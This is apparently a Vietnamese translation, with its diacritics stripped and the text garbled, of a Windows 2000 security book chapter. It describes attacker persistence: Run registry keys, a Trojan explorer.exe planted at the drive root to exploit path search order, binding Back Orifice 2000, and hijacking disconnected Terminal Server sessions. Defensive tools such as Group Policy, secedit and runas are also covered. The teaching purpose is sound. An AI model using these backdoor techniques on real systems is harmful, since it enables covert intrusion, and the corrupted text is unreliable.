S dng tin ch NTRK cp POSIX n file trong chui sau cc tp tin khc (xem chng 5) cng c th thc hin c trong Windows 2000, cho d hin nay c phin bn NTFS mi. Cch tt nht nhn dng cc tp tin chui l s dng trnh duyt sfind trong NTObjective. Sfind c cha trong Forensic Toolkit, c ti trang http:// www.foundstone.com/rdlabs/tools.php?category=Forensic CA SAU (BACK DOORS) Cui cng trong danh sch chn ca k tn cng l s to lp nhng c hi tng lai tr v h thng b tn thng, hy vng khng b nhn ra bi phm vi hot ng ca administrator h thng.

Thao tc Khi ng
Nh chng ti trnh by Chng 5, mt th thut thng dng ca nhng k tn cng l gn kt nhng chng trnh t chy tinh vi vo nhng v tr m chng s t ng khi chy vo gi t trc. Nhng v tr ny vn cn tn ti trong Windows 2000 v chng s c kim tra tm kim cc lnh l trong nhng h thng b tn cng. Mt ln na, nhng gi tr Registry khi ng ph hp c nh v ti HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion: \Run \RunOnce \RunOnceEx Mt im khc bit nh trong Windows 2000 l v tr ca th mc Startup ca i tng s dng. Ti Windows 2000 th mc Startup c ct trong mt th mc khc l Documents and Settng di gc (%systemdrive%\Documents and Settings\%user%\Start Menu\Programs\Startup).

Lp By ng Dn Chy
Tnh 7 Tnh 7 Chu 10 Mc 8 nh hng ri ro n gin ph bin

http://itlab.com.vn

i khi nhng cng thot m ta bit li l rt kh nhn ra. Lu ti v tr n gin ca mt tin ch ca Trojan Windows c tn explorer.exe ti gc ca ng dn %systmedrive% trong h thng mc tiu. (Bt k i tng s dng no cng c th vit c chng trnh ny nh ch mc nh.) Khi mt i tng s dng ngay sau truy xut tng tc, chng trnh t chy ny s tr thnh mt tin ch mc nh cho i tng s dng . V sao iu ny xy ra? Nh gii thiu trong phn B Pht Trin Phn Mm Microsoft (SDK), khi file chy v cc file thuc dng DLL khng c t trc bi mt ng dn trong mc Registry, Windows NT 4.0 / 2000 s tm kim file trong th t cc v tr sau: 1. Th mc ti phn mm ng dng c ci t 2. Th mc hin hnh trong qu trnh x l m 3. Th mc h thng 32 bit (%windir%\System32) 4. Th mc h thng 16 bit (%windir%/System) 5. Th mc Windows (%windir%) 6. Cc th mc c xc nhn trong bin s mt trng PATH. Tnh trng ny c chng minh nh trnh mc nh NT / 2000 c nhn dng nh kha Registry HKLM\SOFTWARE\Mcrosoft\WindowsNT\CurrentVersion\Winlogon\Shell. Gi tr mc nh cho kho ny l explorer.exe; khng c ng dn file no c ch ra. V vy, nu bt k ai sao chp mt trnh chnh sa c tn explorer.exe n gc ca %SystemDrive% (v d: C:\) vo thi gian cho trc, gi tr ca explore.exe ti WinLogon\Shell\explore.exe s c c ra. H thng tp tin s c phn tch ngay ti gc (v th mc hin hnh trong khi h thng khi ng l %systemdrive%), bt gp file chy explorer.exe hiu chnh ca chng ta. Qu trnh ny s tr thnh mt trnh cho phin ng nhp ring bit ny. Theo nhng g Alberto Aragones vit ti trang http://www.quimeras.com/secadv/ntpath.htm, iu ny s rt d dng chng minh c bng cch sao chp mt trnh lnh NT / 2000 (cmd.exe) sang phn gc h thng, sau thot ra khi h thng, v li nhp vo h thng. Trnh Windows chun c che ph bng mt trnh lnh. Chng ta s xem trong Chng 14, cc cng c nh eLiTeWrap s lm cho vic gi cc a chng trnh tr nn d dng hn. Nhng a chng trnh ny cng c th c chy ngm nh v khng ng b nu mun. Bt k ai cng c th d dng lin kt mt back door (nh Back Oifice 2000) vi mt bn sao ca explorer.exe, ri t n vo gc h thng, v chng trnh ny s c khi chy ngm ti thi im c ng nhp tng tc xy ra. Trnh Explorer dng nh vn chy bnh thng, v vy khng ai c th khn ngoan hn th c.

http://itlab.com.vn

Cng ti trang http://www.quimeras.com/secadv/ntpath.htm, Alberto cng a ra mt cch thc thun tin thc hin tiu xo ny t xa. C s thc hin tiu xo ny l da vo my ch c s dng chng trnh kt ni NT / 2000 chy trn my ch mc tiu. u tin, kt ni vi my mc tiu, sau ti ln file chy explorer.exe cng thot (vi dng lnh FTP). Sau , t dng lnh telnet, i thnh %windir%, chy explorer.exe tht, v kt thc phin telnet. Explorer.exe gi s chy trn bt k phin truy cp tng tc no. K thut ny cng c th p dng c i vi DLL. Vi cc file chy ca Windows nhp th vin ng, thng tin trong file chy dng nh v tn ca cc DLL cn thit. H thng s d tm cc DLL theo ng trong trnh t tng t nh trn. Trc trc tng t cng xy ra.

Theo di ng Dn
Cng vic ny cng c thm vo MS00-052 nhng khng bao gm c Service Pack 1, v vy n phi c p dng bt k bn c ang chy h thng Service Pack trc hoc sau hay khng. Ngay c khi file FAQ ca Mcrosoft trong tnh trng d b nh hng ny (http://www.microsoft.com/technet/security/bulletin/fq00-52.asp) c lp gia cc tr s registry do Microsoft cung cp sn, tr s Shell s dng mt ng dn o h tr nhng ng dng tha k, Alberto Aragones khng nh nhiu file chy thiu nhng ng dn chnh xc trong mc Registry (v d nh file rundll32.exe). Qu thc, file rundll32.exe c th tm thy nhiu ni trong mc Registry m khng cn mt ng dn thc. Mt cch khc l truy tm tt c ng dn o trong Registry v suy ra ng dn thc. Ngay c nu mt danh sch ton din v chnh xc v cc file c kh nng b tn thng tn ti, mi vic sa cha chng cng cn rt nhiu n lc v thi gian. Mi vic s tr nn d dng nu bn tun theo nhng th thut hiu qu v ngn cn ng nhp vo server (trin khai Terminal Server s lm iu ny phn no kh khn hn). V tt nhin iu ny s p dng sa cha (tham kho phn trc). V nhng lo ngi tnh tng thch ng dng cp phn trc, cng vic sa cha ny s loi b mi kh nng d b nh hng bng cch a mt dng ch c bit vo m startup suy ra %systemroot% trc khi tr s c nhp vo mc Shell. LI KHUYN: Nu ai dng th thut ny ca Alberto ln my ca bn, bn c th b bi ri khi tm cch a tr h thng v tnh trng bnh thng. Alberto khuyn bn nn chy chng trnh %windir%\explerer.exe t trnh lnh v sau xo trnh thm him cng thot, hoc bn c th ch cn g ren\exploerer.exe harmless.txt, v sau n t hp phm CTRL-ALT-DEL khi ng li.

http://itlab.com.vn

Kim sot T Xa
Mi c ch iu khin t xa c cp n Chng 5 s vn hot ng bnh thng. C ch iu khin t xa t NTRK s c trong Windows 2000 Support Tools (cn nh mi cho nhiu tin ch RK quan trng) nh mt phin bn cp nht c tn wsremote, nhng v c bn c ch ny vn ging nh trc. Chc nng ca c NetBus v WinVNC vn c gi nguyn. Back Orifice 2000 (BO2K) cng hot ng trong Windows 2000. Tt c cc administrator ang ci thm BO gc ch chy c trong Wind9x vn cn c lc phi lo ngi.

My Ch Cui
Tt nhin, mt b xung ln cho Windows 2000 l tnh sn c ca My Ch Cui (Terminal Server) nh mt phn ca cc sn phm Server ct li. Terminal Server ci t c la chn bin Windows thnh mt h thng hon ton khc, trong mi x l ca my khch c chy trn phn trng CPU ca my ch. Trong mi phin bn Windows trc y tr NT Terminal Server Edition l mt sn phm pht trin ring bit m my khch lun chy trong b vi x l ca my khch. y khng phi l mt cuc cch mng i vi UNIX v my tnh ln chy di hnh thc ny k t khi cuc cch mng v my tnh xy ra, nhng administrator NT / 2000 s chc chn quen vi s khc bit gia nhng phin ng nhp bn giao din vi nhng phin tng tc t xa. Nh chng ta thy trong on trc, nhn din mt h thng vi TCP cng 3389 gn nh l mt s nh cuc chc chn i vi My Ch Cui. K tn cng s chuyn sang s dng My Khch Dch V Cui. (Chng trnh ci t s lin kt hai mm v chng trnh ny c th tm thy trong th mc %windir%\system32\clients ca my ch dng Windows 2000). K tn cng dng phng php lp on mt khu c th chng li chng mc Administrator ti im ny. T khi iu ny c xem nh ng nhp tng tc, cc cuc tn cng kiu ny c th vn tip tc chng li chng trnh iu khin min Windows 2000, thm ch ngay c khi passprop/adminlockout c kch hot. (xem chng 5 bit thm v passprop). Tuy nhin, My Khch Dch V Cui s ngt kt ni sau nm ln th tht bi, nhng y li l mt qu trnh mt nhiu thi gian. Chim ot Kt Ni My Ch B Ngt Tnh ph bin 2 Tnh n gin 3

http://itlab.com.vn

Tnh hiu qu

10

Mc 5

ri

ro

y s l nhng iu rt hng th i vi k tn cng ot c c quyn Administrator trong My Ch Cui. Nu Administrator cui cng qun khng thot khi mt phin cui (hay vi phin cui), khi nhng k tn cng tm cch kt ni vi m u nhim Administrator, chng s c hin hu vi hp thoi sau:

Phin chng chn kt ni c th m c nhng ti liu ca mt phn nhy cm hay nhng d liu khc hay nhng ng dng c th ang chy m k tn cng c th t nhin lc li mi th bng phng php th cng.

Thot khi nhng vng cui (Terminal Sessions)

Ch ng ca s my khch hoc chn Disconnect s lm cho phin hot ng. m bo chn Log Off t c Start hay Shut Down, hoc bng cch s dng phm tt CTRL-ALT-END ca Terminal Server Client. Sau y l danh sch cc phm tt khc c trong Terminal Service Client: CTRL-ALT-END M hp thoi Windows Security. ALT-PAGE UP o cc chng trnh t tri sang phi. ALT-PAGE DOWN o cc chng trnh t phi sang tri. ALT-INSERT Xoay qua cc chng trnh chng c khi ng. ALT-HOME Hin th trnh n Start. CTRL-ALT-BREAK o my khch gia mt ca s (nu p dng c) v phng to mn hnh. ALT-DEL Hin th trnh n bt ln ca window. CTRL-ALT-MINUS (-) t mt hnh nh ca ca s ang hot ng qua mt phm trn vng phm s, trong my khch, ln trn Bng

http://itlab.com.vn

Ghi Tm My Ch Cui. (Nhn phm tt ALT-PRINTSCRN trn mt my tnh cc b cng cho kt qu tng t.) CTRL-ALT-PLUS (+) t mt hnh nh ca ton b khu vc ca s my khch ln Bng Ghi Tm My Ch qua mt phm trn vng phm s. (Nhn phm tt ALTPRINTSCRN trn mt my tnh cc b cng cho kt qu tng t.)

LI KHUYN: Mt my ch tng thch SSH1 dng Windows 2000 t do c ti http://marvin.criadvantage.com/caspian/Software/SSHD-NT/default.php, v mt vi my ch thng mi SSH2 cng hin ang co sn. Trnh bo mt (SSH) l c s ca vic qun l bo mt t xa trong h thng dng UNIX trong nhiu nm nay v l mt dng lnh mnh lun phin i vi My Ch Cui h tr vic qun l t xa ca Windows 2000. (xem phn Secure Shll FAQ ti http://www.employees.org/~satch/ssh/faq/ssh-faq.html bit thm chi tit v SSH).

Keystroke Loggers
NetBus keystroke logger, cng nh Invisible Keylogger Stealth (IKS) vn hot ng tt trong Windows 2000, c hai c cp n trong chng 5. BIN PHP I PH CHUNG: NHNG CNG C BO MT WINDOWS MI Windows 2000 cung cp nhng cng c qun l bo mt mi tp trung phn ln nhng chc nng khc bit ca NT4. Nhng tin ch ny rt hu ch cho vic bo v h thng hay ch cho vic qun l cu hnh my nhm gi cho h thng lun trnh c nhng li hng hc.

Chnh sch Nhm

Mt trong nhng cng c mi hu hiu nht c trong Windows 2000 l Group Policy m chng ta i khi gp trong chng ny. Group Policy Objects (GPO) c th c lu trong AD hay trn mt my tnh cc b xc nh tham s cu hnh nht nh trn mt cp min hoc cp cc b. GPO c th c p dng i vi cc trang, min, hay cc n v t chc

http://itlab.com.vn

(OU) v c truyn cho ngi s dng hay chnh my tnh m chng cha (gi l thnh vin ca GPO ). GPO c th c hin th v hiu chnh trong bt k ca s giao tip MMC no (i hi c c quyn ca Administrator). GPO gn vi Windows 2000 l My Tnh Cc B, Min Mc nh, v Chnh sch iu Khin Min. Ch bng cch chy Start/gpedit.msc, GPO My tnh cc b s c bt ln. Mt cch khc hin th GPO l lm hin th mc Properties ca mt i tng th mc ch nh (min, OU, hay vng), v sau chn mc Group Policy nh minh ho di y. Mn nh ny hin th GPO ring bit ng dng cho i tng c chn (c u tin lit k) v s tha k c b chn hay khng, v cho php GPO c hiu chnh.

Hiu chnh GPO s cho thy s tha cu hnh bo mt. Cu hnh bo mt ny c th c p dng i vi nhiu i tng th mc. Mt li ch ring l (Of particular interest is) nt Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options trong GPO. C hn 30 tham s y c th dng nh cu hnh nhm nng cao bo mt cho bt k i tng my tnh no m c p dng GPO. Nhng tham s ny bao gm Additional Restrictions For Anonymous Connections (thit lp RestrictAnonymous), LanManager Authentication Level, v Rename Administrator Account, ba thit lp quan trng ny ch c truy cp qua mt vi giao din khc bit NT4. Nt Security Settings cng l ni Account Policies; Audit Policies; v Event Log, Public Key, v IPSec policies c th c thit lp. Bng vic cho php nhng th thut hu hiu ny c thit lp ti vng, min, hay ti mc OU, cng tc qun l bo mt trong nhng mi trng ln c gim i ng k. Qun L Min Mc nh GPO c ch r trong hnh 6-4. Nhng GPO dng nh l phng cch cui cng cng vic nh cu hnh c bo mt trong nhng min Windows 2000 rng ln.Tuy nhin, bn c th ch thu c nhng kt qu tht thng khi to s kt hp gia qun l mc min v mc cc b, v s tr hon trc khi nhng thit lp

http://itlab.com.vn

Group Policy c hiu lc c th cng gy kh chu cho bn. S dng cng c secedit lm mi Policy ngay lp tc l mt cch gii quyt s tr hon ny (Secedit s c ni ti chi tit hn phn sau). lm mi li Policy s dng secedit, m hp thoi Run v nhp vo Secedit / refreshpolicy MACHINE_POLICY lm mi li policy di nt User Configuration, g Secedit / refreshpolicy USER_POLICY

Nhng Cng C nh Cu Hnh Bo Mt

Lin quan n c trng Group Policy l Cng C nh Cu Hnh Bo Mt, cng c ny bao gm cc tin ch Phn Tch v nh Cu Hnh Bo Mt v tin ch Khun Mu Bo Mt. Cng c Phn Tch v nh Cu Hnh Bo Mt cho php cc administrator kim li cu hnh h thng cho tng thch vi khun mu nh sn v ti nh cu hnh bt k mt thit lp no khng ph hp. Cng c ny tin dng nh mt MMC snap-in, hay nh mt phin bn dng lnh (secedit). y l mt c ch mnh cho mi quyt nh nhanh nu mt h thng gp phi nhng yu cu bo mt ng c s. Tht khng may, cng vic phn tch v nh cu hnh ch c th p dng i vi nhng h thng cc b v khng p dng c i vi phm vi vng min. Tin ch secedit c th c dng trong cc logon batch script b tr cu hnh v phn tch n cc h thng xa, nhng tin ch ny vn khng trn tru nh tnh nng ca Group Policy trong mi trng phn pht. Tuy nhin mt iu may mn l nhng khun mu bo mt c th c nhp vo mt Group Policy. V vy, bt c min, vng, OU no c GPO p dng vo s nhn c nhng thit lp khun mu bo mt. nhp mt khun mu bo mt, kch phi chut vo nt Computer Configuration\Windows Settings\Security Settings, v chn Import t trnh n ni dung. Chc nng Import mc nh vi %windir%\security\template directory, ti ni y tiu chun t ra ca 11 khun mu bo mt c lu tr.

http://itlab.com.vn

Thc ra, 11 khun mu bo mt ny cng t cha ng cng c Security Templates. Nhng file khun mu ny xut pht t nhiu mc bo mt khc nhau m c th s dng kt hp vi cng c Phn Tch v nh Cu Hnh Bo Mt. Mc d rt nhiu nhng tham s cha c xc nh nhng chng l nhng im khi u tt khi thit k mt khun mu cho phn tch v nh cu hnh h thng. Nhng file ny c th c hin th qua Security Templates MMC snap-in hay bng nh cu hnh th cng vi mt trnh son tho vn bn (mt ln na cc file ny c ui m rng l .inf v c nh v ti %windir%\security\templates\.)

Runas
i vi nhng ngi thc s quan tm ti UNIX, n vi Windows dng nh ch l mt bc nh, nhng cui cng Windows 2000 cho ra i lnh chuyn i i tng s dng ban u c tn runas. Vn ni ting t lu v Bo mt, ta lun mong mun c c tnh nng thc thi lnh trong mi trng m trng mc i tng s dng c c quyn mc hn ch nht. Malicious Trojans, cc file chy, th din t, hay cc trang Web t xa trong mt trnh duyt c th khi chy tt c cc lnh vi c quyn ca i tng s dng hin ti; v i tng s dng ny cng c nhiu c quyn th nhng hng hc tin tng cng ti t. Rt nhiu cuc tn cng kiu ny c th sy ra trong mi hot ng thng ngy v v vy s tr nn c bit quan trng i vi nhng ai cn c quyn Administrator thc hin mt phn trong cng vic thng ngy ca h (thm trm lm vic vo min, qun l ngi s dng, phn cng nhng cng vic thng thng). Khi nhng thao tc bo mt hu hiu nht hot ng, nhng ai khng may ng nhp vo h thng ca h nh Administrator dng nh khng bao gi c thi gian ng nhp nh mt ngi s dng bnh thng. iu ny thc s nguy him trong th gii mng my tnh ang ph bin hin nay. Nu mt Administrator gp phi mt trang Web c kh nng lm hi hay c mt th nh dng HTML vi ni dung hot ng nhng (embedded active content) (xem Chng 16), th nhng h hng c th ln hn rt nhiu so vi khi Joe User mc li tng t trn trm lm vic c lp ca mnh. Lnh runas cho php mi ngi c th ng nhp nh mt ngi s dng t c quyn v dn leo ln Administrator trn c s per-task. V d Joe c ng nhp nh mt User bnh thng vo h iu khin min qua Terminal Server, v anh ta bng nhin mun i mt trong nhng mt khu Domain Admins (c th mt trong s chng ch thot khi canh gia thao tc). Tht khng may, anh ta thm ch khng th khi ng c Active Directory Users And Computers nh mt ngi s dng bnh thng cho php thay i mt mnh Domain Admin password. Runas n cu gip. Sau y l nhng g anh ta lm:

http://itlab.com.vn

1. Nhp Start / Run v sau g Enter Runas /user:mydomain\administrator mmc %windir%\system32\dsa.msc 2. Nhp mt khu Administrator. 3. Khi Active Directory Users And Computers c khi ng (dsa.mmc), anh ta c th i mt khu Administrator vo bt c lc no, nh c quyn ca chng mc mydomain\Administrator. 4. Sau anh ta thot Active Directory Users And Computers v tr li bnh thng nh mt ngi s dng bnh thng.
Anh Joe ca chng ta va t mnh thot khi s rm r khi phi ng xut Terminal Server, v sau li ng nhp nh Administrator, ng xut mt ln na, v li ng nhp tr li nh mt ngi s dng bnh thng. t c quyn quyt nh ngy hm .

Mt trong nhiu v d trc y v ngi s dng thng minh khi dng runas s chy mt trnh duyt web hay mt trnh c mail nh mt ngi s dng t c quyn. Tuy nhin, y l ni runas i hi s kho lo nh mt mch kh di v danh sch a ch th NTBugtraq c vit chi tit vo cui thng 3/2000 (vo http://www.ntbugtraq.com). Nhng ngi tham gia u c gng tm ra chnh xc nhng c quyn no s hot ng khi mt URL c gi ra trong ca s tm kim trong mt h thng vi nhiu ca s m, bao gm mt s vi c quyn runas /u:Administrator. Mt gi ra l c mt li tt vo trnh tm kim ny ( thu nh) trong nhm Startup, n lun c khi ng vi c quyn nh nht. Tuy nhin mt t cui cng khi s dng runas theo cch ny l vi nhng ng dng khi ng thng qua trao i d liu ng (DDE), nh IE, thng tin bo mt quan trng c tha k t qu trnh x l (m) to lp. V vy, runas thc s cha bao gi to ra nhng x l cn thit cho vic iu khin hyperlinks, embedded Word docs, v rt nhiu th khc na. To lp x l m khc bit bi chng trnh, v vy rt kh xc nh quyn s hu thc s. C th hng Microsoft mt ngy no s phn bit c liu y c thc s l mt thao tc bo mt tt hn vic ng xut tt c cc ca s Administrator thc hin trnh tm kim. Runas khng phi l mt vin n bng bc. Khi c ch ra trong chui Bugtraq, n s gim i mt s mi nguy him ny, nhng li to ra mt s nguy him khc (Jeff Schmidt). Hy s dng runas tht khn kho. LI KHUYN: Gi phm SHIFT khi nhp phi chut vo mt file trong Windows 2000 Explorer mt tu chn gi l Run As by gi s xut hin trong trnh n mi trng.

http://itlab.com.vn

TNG LAI CA WINDOWS 2000

Trong phn ny chng ti s cp n tng lai pha trc ca mt vi cng ngh mi c lin quan ti bo mt. Cng ngh ny s nh dng nn Windows 2000 khi n tin ln trong nhng nm sp ti. c bit chng ti s xem xt nhng bc pht trin sau:

.NET Framework Windows XP / Codename Whistler. .NET FRAMEWORK

.NET Framework (.NET FX) ca hng Microsoft cha ng mt mi trng cho xy dng, trin khai, v chy Web Services v cc ng dng khc. Bn khng nn bi ri trc .NET Initiative ton th ca Microsoft, .NET Initiative ton th ny lin quan n nhng cng ngh tun th theo thut ng thng dng nh XML; Simple Object Access Protocol (SOAP); v Universal Discovery, Description and Intergration (UDDI). .NET Framework l mt phn quan trng ca sng kin , nhng n thc s l nn cng ngh khc bit hn so vi tng th tm nhn .NET ca mt my tnh c nhn nh mt cm cho cc dch v.

Thc ra nhiu ngi gi .NET Framework l mt s cnh tranh tnh nng v tnh nng i vi mi trng lp trnh Java v cc dch v lin quan ca Sun Microsystem. R rng y l mt s chuyn i mang tnh t ph cho Microsoft. Bc chuyn ny h tr s pht trin v mi trng thc hin hon ton khc bit vi c s truyn thng ca th gii Windows, Win32 API v NT Service. Ging nh vic ct gim bt trch nhim ca cng ty giao ph tt c cc sn phm vi mng Internet mi ra i vo gia nhng nm 1990, NET Framework chnh l khi im quan trng i vi Microsoft. N c th c gn ghp ph bin vo nhng cng ngh khc ca Microsoft trong tng lai. Hiu c trin vng ca hng i mi ny l rt cn thit i vi nhng ai c trch nhim a cng ngh ca Microsoft tin bc trong tng lai. CH Xem Hacking Exposed Windows 2000 (Osborne/McGraw-Hill, 2001) bit thm chi tit v .NET Framework.
CODENAME WHISTLER

Mi chng trong bo mt Windows 2000 s l cha nu nh thieu s kim tra nhng tnh nng bo mt mi c d nh trong phin OS sp ti. K t khi bi vit ny n tay cc bn, Release Candidate 1 (RC1) cho Condename Whistler c tung ra, v vy s phn tch ton din v tnh nng ny l mt bc i trc. Tuy nhin, chng ta s i kho st khi qut tnh nng ny v dng nhng n tng ban u ca chng ta y.

http://itlab.com.vn

Phin Bn Whistler

Th h tip theo ca Windows hin c chia thnh SKU (Shop Keeper Units, l ch danh ID) khch v ch. Nhng phin bn my khch c gi l Windows XP v bao gm bn lm vic Professional Edition (Windows XP Pro), Home Edition vi ch l SOHO/khch hng, v Windows XP 64-bit Edition ng dng c bit u trn. Nhng phin bn ch s c th mang tn .NET Server (mc d chng vn c cp n vi ci tn codename Whistler) v s c th bao gm c nhng c tnh ca Server c v Advanced Server. Sau y l tm lc: My khch Windows XP Professional (bn lm vic) Windows XP Home Edition (khch hng) Windows XP 64-bit Edition (ng dng thc thi cao) My ch .NET Server (Whistler) CH Windows XP Home Edition c cp trong Chng 4.
Internet Connection Firewall (Tng bo v kt ni Internet) Internet Connection Firewall (ICF) c th l tnh nng bo mt d nhn thy nht do n gn lin trn h iu hnh OS mi. ICF a ra cc tnh nng trch lc gi tin cho php s dng mng hng ra m nhng vn kho tnh nng kt ni hng vo.

Software Restriction Policies (cc chnh sch hn ch phn mm)

Software Restriction Policies ca Windows XP l bc tin tip theo ca hng Microsoft trong cuc chin m nghch, kt hp mt vi c tnh ring bit ca h iu hnh trc thnh mt th thng nht chng li m nguy him nh virus ly qua ng th in t.

Built-in Wireless Networing Authentication and Encytion (Tnh nng m ho v xc nh mng khng dy c ci t sn)
Secure / Ethernet LAN trong Windows XP thc hin chc nng an ninh cho c mng LAN khng dy v c dy da trn tnh nng c t IEEE 802.11. Lu rng mng LAN phi thc hin hiu qu iu khin truy xut i vi tnh nng ny; nhng bng cch gn h tr vo Windows, Microsoft tm cch lm cho OS c th tham gia vo mi trng an ninh ny c d dng v minh bch hn.

CH Mt s cuc tn cng c th ph v nhng c tnh bo mt 802.11 hin hnh. Xem chng 14 bit thm chi tit.

http://itlab.com.vn

MS Passport Single Login Tch Hp cho mng Internet

Trong Windows XP, nhng giao thc xc nh Passport c thm vo WinInet (WinInet l DLL c chc nng qun l kh nng kt ni Internet). H chiu l gii php ng nhp n ca Microsoft vo Internet. Cc chng mc i tng s dng c lu trong nhng my ch chy chng trnh Microsoft, v khi c xc thc gi tr cho dch v, mt thit b chng gi mo c thit lp trn my ca i tng s dng trong mt thi gian nht nh. Thit b ny c th c s dng truy cp cc trang khc c ni dung h tr lc xc thc gi tr H chiu.
Bin php qun l cc b v nhm mi

C mt s thit lp mi c th c nh cu hnh thng qua Bin Php Qun L Cc B V Nhm ca Windows XP/Whistler, bao gm mt thit lp iu khin mc thiu ht gi tr phc tp ca LAN Manager. Ngoi nhiu thit lp mi c th c nh cu hnh, Whistler cng a ra mt b sung mi cho Bin Php Qun L Nhm c tn Resultant Set of Policy (RSOP). RSOP thc hin kh nhiu chc nng. RSOP c chc nng truy hi nhng giao im gia nhng i tng Qun l nhm p dng ti cc cp trong th mc (vng, min, hay OU) v tr v thit lp qun l hiu qu. Kim tra th t qun l theo cch ny c th cng vic g ri tr nn d dng hn. RSOP c thc hin nh cng c gpresult dng lnh.
Qun L U Quyn (Credential Management)

c tnh Qun L S U Nhim cung cp mt ni lu gi bo mt ca s u nhim cho i tng s dng, bao gm mt khu v nhng xc nhn chng thc X.509. Xc nhn ny cung cp mt phng thc ng nhp n nht qun cho ngi s dng, bao gm nhng i tng s dng t do, thng qua vic cho php h d dng truy cp nh thng xuyn s dng s u nhim mt cch r rng. To cho ngi s dng d dng hn khi phc hi mt khu ti nhng h thng khc v lu chng trong mt ni c lp, iu ny dng nh khng phi l mt kin hay cho chng ta. Tt nhin, Windows c th t ng lu s u quyn qu ln ngy hm nay trong mt vi ni ring bit (mt khu ca mt trang Web qua IE, mt khu chng mc quay s, mt khu ng nhp min ti LSA.), v vy c th mt ni cha hay mt API tp trung cho vic lu tr c bo mt nhng thng tin trn l mt s tin b ng k. Chng ta s c thy sau.
Kch Hot Sn Phm Windows

Mc d khng ch n thun l mt c tnh bo mt theo quan im ca khch hng ca Microsoft, Kch Hot Sn Phm Windows (WPA) cn c

http://itlab.com.vn

th c nhn nhn nh mt bin php bo mt rt quan trng theo quan im ca Microsoft. Trong bt k trng hp no, WPA vn to mt chuyn bin quyt nh trong qu trnh pht trin Windows tr mt ngoi l nhng phin bn Volume Licensed (VL), mi SKU khch ca Windows s c th cn c kch hot thng qua ng vin thng hay Internet.
Qun L V iu Khin T Xa

Windows XP/Whistler c hai tnh nng iu khin t xa c xy dng da trn k thut SO. Nhng c tnh ny c qun l bng System Control Panel/Remote tab. u tin l Remote Assitance (tr gip t xa), s c tho lun ti Chng 14.
Bn th hai, my tnh bn t xa, l my ch u cui cho h iu hnh Windows XP. (N khng c sn trong phin bn gc). N cung cp s ng nhp ln nhau t xa vo v h iu hnh Windows XP thng qua giao thc my tnh bn t xa (RDP), ch ging nh my ch u cui. RDP s dng TCP 3389 m s c trong cc my cng vi my tnh bn t xa c kh nng. Ti liu hin hnh ca Microsoft ngh mt khung cnh thng dng s dng cc my tnh bn t xa: mt nhn vin ca cng ty c th thit lp t xa vo trm lm vic c quan ca anh ta hay c ta v sau kt ni ti cc h thng vo ban m t nh sp xp mt vi tc v cha hon thnh. Chng ta nghi ngi nhiu s an ton ca nh qun tr lun m mng ho huyn khi n c th trn cc mng ca h. Chun Plug and Play ph bin

H iu hnh Windows XP/ Whistler thm s h tr la chn cho chun Plug and Play (cm vo l chy) chung, m l mt chun ci tin cho s khm ph cc thit b chung v s nhn dng thng qua cc mng. Bc tranh r rt v my tnh ca bn lun qua mng v nh dng bt k mt my in no, dung lng ca chng, v..v.. Tt nhin, qu trnh khm ph ny l mt ng hai chiu, v nhiu thit b khc cng c th lm lt thng tin v h thng ca bn thng qua UpnP. Loi ging nh l SNMP cng vi s khm ph t ng v khng c xc nhn (trong khuynh hng c trng). Nu dch v UpnP iu khin bng tay c lp t( thng qua chng trnh thm vo /di chuyn/ b phn Window/ cc dch v mng thit b Plug and Play), v dch v my ch thit b UpnP c th, h thng s nghe trn TCP 2869. Dch v ny hi p ti nhng cu lnh HTTP dc bit. Giao thc khm ph dch v n gin (SSDP) cng c thit lp v nghe thng qua nhiu IP.Theo kin ca chng ti, UpnP c th thm vo s xc thc trong phin bn 2 ca giao thc, v n lc y Microsoft nn a n ra.
Mt ch v nhng cm th v nhng yu cu khng c cn c khc Nhiu yu cu thi phng v s an ton ca Window XP/ Whistler din ra tng ngy, v cng nhiu m bo s c lm tt hn sau khi cng b. Tuy c lm bi Microsoft, nhng iu h tr n, hay nhiu ngi ch trch n, l nhng yu cu s ch b tiu tan bi thi gian v s kim chng trong nhng hon cnh ca th gii thc. Gn y, ngi hay

http://itlab.com.vn

chm chc s an ton Steve Gibson a ra mt quyt on gy xn xao d lun rng Window XP khuyn khch giao din chng trnh c gi l nhng cm th s dn n a ch mng m rng la bp v dch v t chi nhng cuc xm nhp trn nn nhng cng ngh nh vy. Chng ta s a mi ngi tr tch cui cng trn quyt on ny rng v tr ca chng ta s c kt lun trn s an ton ca Window.

Hu ht nhng s qun co khng an ton v nhng kt qu Window t nhng li chung tn ti trn nhiu cng ngh khc v trong mt thi gian di. N ch ti t duy nht bi s pht trin m rng ca Window. Nu bn chn s dng din n Window cho nhiu l do rng n qu ph bin ( d s dng, thch hp, v..v..), bn s chu gnh nng v s hiu bit v cch to n an ton v gi c n nh th no. Hy vng rng, bn cm thy t tin vi kin thc thu c t quyn sch ny . Chc may mn !
Tng kt Vi s khc thng v s khai thc ca IIS5, Windows 2000 ch ra c s tin b thng qua NT4 trong tng giai on ca ton b s an ton. Thm vo nhng c trng an ton mi nh l IIPSec v mt chnh sch an ton phn b chnh xc cng gip tng tr ngi cho nhng k xm nhp v gim gnh nng cho nh qun l. y l mt vi mo an ton bin dch t s tho lun ca chng ta trong chng ny v chng 5 v NT, v t mt la chn v nhng ngun an ton nht cu Window 2000 trn mng Internet: Kim tra s xm nhp nguy him vo Window 2000 hon thnh s bo v an ton cho Window 2000 t u n cui. Quyn sch bao qut v m rng thng tin cp trong cun sch ny pht hnh kt qu phn tch an ton ton din ca Microsoft v v tr h iu hnh v nhng phin bn tng lai. Nhn vo bi tng kt t chng 5 kim tra danh sch vch ranh gii ti NT vng chc. Hu ht, nu tt c nhng thng s ny khng ng dng cho Window 2000. ( Tuy nhin, mt vi trong s chng c th trong mt vi phn mi ca UI c th Nhmi tng chnh sch Cu hnh my tnh\ Ci t Window\ Ci t an ton\ Nhng chnh sch cc b\ Nhng la chn an ton. S dng dnh sch an ton c Microsoft cung cp c sn ti http:// www.microsoft.com/security. Cng a ra cng c cu hnh IIS5 cho php ngi s dng nh ra khun mu trn nn tng nhng bi thc hnh tt c to v c ng dng cho cc My ch thng tin mng Internet Window 2000 . http:// Xem www.microsoft.com/TechNet/prodtechnol/sql/maintain/security/sql2ksec. Asp, thng tin v s an ton SQL Server 2000 trn Window 2000, v xem http:// www.sqlsecurity.com thng tin chi tit v tnh d gy nguy him nht trn SQL. Cng vy, s xm nhp nguy him vo Window 2000 bao gm ton b chng ny v nhng cuc xm nhp SQL v nhng bin php i ph tt c cc ngun. Nh rng cp h iu hnh (OS) c th khng phi l ni mt h 